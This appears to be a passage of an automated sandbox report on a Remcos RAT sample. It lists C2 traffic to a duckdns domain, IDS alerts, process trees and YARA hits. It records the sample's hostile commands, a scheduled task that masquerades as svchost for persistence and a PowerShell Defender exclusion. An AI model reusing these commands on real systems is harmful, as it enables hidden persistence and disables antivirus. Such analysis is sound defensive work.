                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x95900x1c.text
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x75ac0x760036e604f93f9478fe2de74921e072ce89False0.6243710275423728data6.539960571499222IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xa0000x5860x6004e08eb94fc585514b80564c30472bd68False0.4114583333333333data4.001972910661674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0xa0a00x2fcdata0.43324607329842935
                                    RT_MANIFEST0xa39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                    2024-07-25T23:59:00.550615+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497355841192.168.2.945.128.223.185
                                    2024-07-25T23:55:25.686720+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497375841192.168.2.945.128.223.185
                                    2024-07-25T23:58:38.108502+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497345841192.168.2.945.128.223.185
                                    2024-07-25T23:57:08.332725+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497305841192.168.2.945.128.223.185
                                    2024-07-25T23:56:28.494106+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972920.114.59.183192.168.2.9
                                    2024-07-25T23:58:15.639944+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497335841192.168.2.945.128.223.185
                                    2024-07-25T23:56:45.785746+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497285841192.168.2.945.128.223.185
                                    2024-07-25T23:56:23.330651+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497275841192.168.2.945.128.223.185
                                    2024-07-25T23:57:30.731799+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497315841192.168.2.945.128.223.185
                                    2024-07-25T23:57:53.124261+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497325841192.168.2.945.128.223.185
                                    2024-07-25T23:59:23.078437+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497365841192.168.2.945.128.223.185
                                    2024-07-25T23:55:50.446155+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972120.114.59.183192.168.2.9
                                    2024-07-25T23:56:00.430258+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497115841192.168.2.945.128.223.185
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 25, 2024 23:55:39.056580067 CEST497115841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:55:39.061779976 CEST58414971145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:55:39.061863899 CEST497115841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:55:39.075270891 CEST497115841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:55:39.080121040 CEST58414971145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:00.430183887 CEST58414971145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:00.430258036 CEST497115841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:00.430366993 CEST497115841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:00.435185909 CEST58414971145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:01.911915064 CEST497275841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:01.917787075 CEST58414972745.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:01.917857885 CEST497275841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:01.922972918 CEST497275841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:01.928886890 CEST58414972745.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:23.330543995 CEST58414972745.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:23.330651045 CEST497275841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:23.331029892 CEST497275841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:23.336682081 CEST58414972745.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:24.344351053 CEST497285841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:24.349348068 CEST58414972845.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:24.349473953 CEST497285841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:24.353271008 CEST497285841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:24.358247995 CEST58414972845.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:45.782042980 CEST58414972845.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:45.785746098 CEST497285841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:45.785792112 CEST497285841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:45.790676117 CEST58414972845.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:46.916649103 CEST497305841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:46.921782970 CEST58414973045.128.223.185192.168.2.9
                                    Jul 25, 2024 23:56:46.921894073 CEST497305841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:46.925416946 CEST497305841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:56:46.930659056 CEST58414973045.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:08.332643986 CEST58414973045.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:08.332725048 CEST497305841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:08.332775116 CEST497305841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:08.337728977 CEST58414973045.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:09.344379902 CEST497315841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:09.349420071 CEST58414973145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:09.349508047 CEST497315841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:09.352982044 CEST497315841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:09.357816935 CEST58414973145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:30.729741096 CEST58414973145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:30.731798887 CEST497315841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:30.731843948 CEST497315841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:30.736706018 CEST58414973145.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:31.735832930 CEST497325841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:31.741041899 CEST58414973245.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:31.741187096 CEST497325841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:31.745014906 CEST497325841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:31.750381947 CEST58414973245.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:53.124169111 CEST58414973245.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:53.124260902 CEST497325841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:53.124392033 CEST497325841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:53.129245043 CEST58414973245.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:54.261418104 CEST497335841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:54.267031908 CEST58414973345.128.223.185192.168.2.9
                                    Jul 25, 2024 23:57:54.269819021 CEST497335841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:54.273334026 CEST497335841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:57:54.278377056 CEST58414973345.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:15.639847994 CEST58414973345.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:15.639944077 CEST497335841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:15.640014887 CEST497335841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:15.644906998 CEST58414973345.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:16.700345039 CEST497345841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:16.707278013 CEST58414973445.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:16.709891081 CEST497345841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:16.715603113 CEST497345841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:16.720451117 CEST58414973445.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:38.108330011 CEST58414973445.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:38.108501911 CEST497345841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:38.108501911 CEST497345841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:38.113485098 CEST58414973445.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:39.110229015 CEST497355841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:39.116229057 CEST58414973545.128.223.185192.168.2.9
                                    Jul 25, 2024 23:58:39.120592117 CEST497355841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:39.126960993 CEST497355841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:58:39.134103060 CEST58414973545.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:00.550501108 CEST58414973545.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:00.550615072 CEST497355841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:00.550663948 CEST497355841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:00.566350937 CEST58414973545.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:01.671878099 CEST497365841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:01.676621914 CEST58414973645.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:01.677864075 CEST497365841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:01.681865931 CEST497365841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:01.928378105 CEST58414973645.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:23.078325033 CEST58414973645.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:23.078437090 CEST497365841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:23.081104040 CEST497365841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:23.085952044 CEST58414973645.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:24.094465017 CEST497375841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:24.100158930 CEST58414973745.128.223.185192.168.2.9
                                    Jul 25, 2024 23:59:24.100246906 CEST497375841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:24.103715897 CEST497375841192.168.2.945.128.223.185
                                    Jul 25, 2024 23:59:24.108534098 CEST58414973745.128.223.185192.168.2.9
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 25, 2024 23:55:37.100733042 CEST5773653192.168.2.91.1.1.1
                                    Jul 25, 2024 23:55:38.109520912 CEST5773653192.168.2.91.1.1.1
                                    Jul 25, 2024 23:55:38.759871960 CEST53577361.1.1.1192.168.2.9
                                    Jul 25, 2024 23:55:38.759932995 CEST53577361.1.1.1192.168.2.9
                                    Jul 25, 2024 23:56:46.799740076 CEST5910153192.168.2.91.1.1.1
                                    Jul 25, 2024 23:56:46.915735006 CEST53591011.1.1.1192.168.2.9
                                    Jul 25, 2024 23:57:54.145903111 CEST5629953192.168.2.91.1.1.1
                                    Jul 25, 2024 23:57:54.259284019 CEST53562991.1.1.1192.168.2.9
                                    Jul 25, 2024 23:59:01.563302040 CEST5585553192.168.2.91.1.1.1
                                    Jul 25, 2024 23:59:01.669534922 CEST53558551.1.1.1192.168.2.9
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jul 25, 2024 23:55:37.100733042 CEST192.168.2.91.1.1.10x62fbStandard query (0)windowsserverfebarch.duckdns.orgA (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:55:38.109520912 CEST192.168.2.91.1.1.10x62fbStandard query (0)windowsserverfebarch.duckdns.orgA (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:56:46.799740076 CEST192.168.2.91.1.1.10x7f44Standard query (0)windowsserverfebarch.duckdns.orgA (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:57:54.145903111 CEST192.168.2.91.1.1.10xe03cStandard query (0)windowsserverfebarch.duckdns.orgA (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:59:01.563302040 CEST192.168.2.91.1.1.10x3322Standard query (0)windowsserverfebarch.duckdns.orgA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jul 25, 2024 23:55:38.759871960 CEST1.1.1.1192.168.2.90x62fbNo error (0)windowsserverfebarch.duckdns.org45.128.223.185A (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:55:38.759932995 CEST1.1.1.1192.168.2.90x62fbNo error (0)windowsserverfebarch.duckdns.org45.128.223.185A (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:56:46.915735006 CEST1.1.1.1192.168.2.90x7f44No error (0)windowsserverfebarch.duckdns.org45.128.223.185A (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:57:54.259284019 CEST1.1.1.1192.168.2.90xe03cNo error (0)windowsserverfebarch.duckdns.org45.128.223.185A (IP address)IN (0x0001)false
                                    Jul 25, 2024 23:59:01.669534922 CEST1.1.1.1192.168.2.90x3322No error (0)windowsserverfebarch.duckdns.org45.128.223.185A (IP address)IN (0x0001)false

                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:17:55:30
                                    Start date:25/07/2024
                                    Path:C:\Users\user\Desktop\LisectAVT_2403002A_136.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_136.exe"
                                    Imagebase:0x214239c0000
                                    File size:864'352 bytes
                                    MD5 hash:404E164E7C5F003A1AC5EC58CE77A534
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1359537990.000002142576F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1359537990.0000021425A97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:17:55:30
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff77afe0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:17:55:32
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                    Imagebase:0x7ff6efb00000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:17:55:32
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:17:55:32
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat""
                                    Imagebase:0x7ff6efb00000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:17:55:32
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:17:55:32
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                    Imagebase:0x7ff71fb60000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:17:55:32
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\timeout.exe
                                    Wow64 process (32bit):false
                                    Commandline:timeout 3
                                    Imagebase:0x7ff651960000
                                    File size:32'768 bytes
                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:9
                                    Start time:17:55:33
                                    Start date:25/07/2024
                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                    Imagebase:0x13898750000
                                    File size:864'352 bytes
                                    MD5 hash:404E164E7C5F003A1AC5EC58CE77A534
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1563081980.000001389A606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    Target ID:10
                                    Start time:17:55:35
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                    Imagebase:0x7ff760310000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:17:55:35
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:17:55:35
                                    Start date:25/07/2024
                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                    Imagebase:0x13f3d0c0000
                                    File size:864'352 bytes
                                    MD5 hash:404E164E7C5F003A1AC5EC58CE77A534
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1523488725.0000013F3F317000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:13
                                    Start time:17:55:35
                                    Start date:25/07/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                    Imagebase:0x730000
                                    File size:2'141'552 bytes
                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:14
                                    Start time:17:55:36
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                    Imagebase:0x7ff77afe0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:17:55:36
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 464 -p 7964 -ip 7964
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:17:55:36
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:17:55:37
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                    Imagebase:0x7ff760310000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:17:55:37
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:17:55:37
                                    Start date:25/07/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                    Imagebase:0x790000
                                    File size:144'344 bytes
                                    MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    Target ID:20
                                    Start time:17:55:37
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 436 -p 8048 -ip 8048
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:17:55:37
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
                                    Imagebase:0x7ff754570000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:17:55:39
                                    Start date:25/07/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                    Imagebase:0x7ff77afe0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:17:55:44
                                    Start date:25/07/2024
                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                    Imagebase:0x20a33710000
                                    File size:864'352 bytes
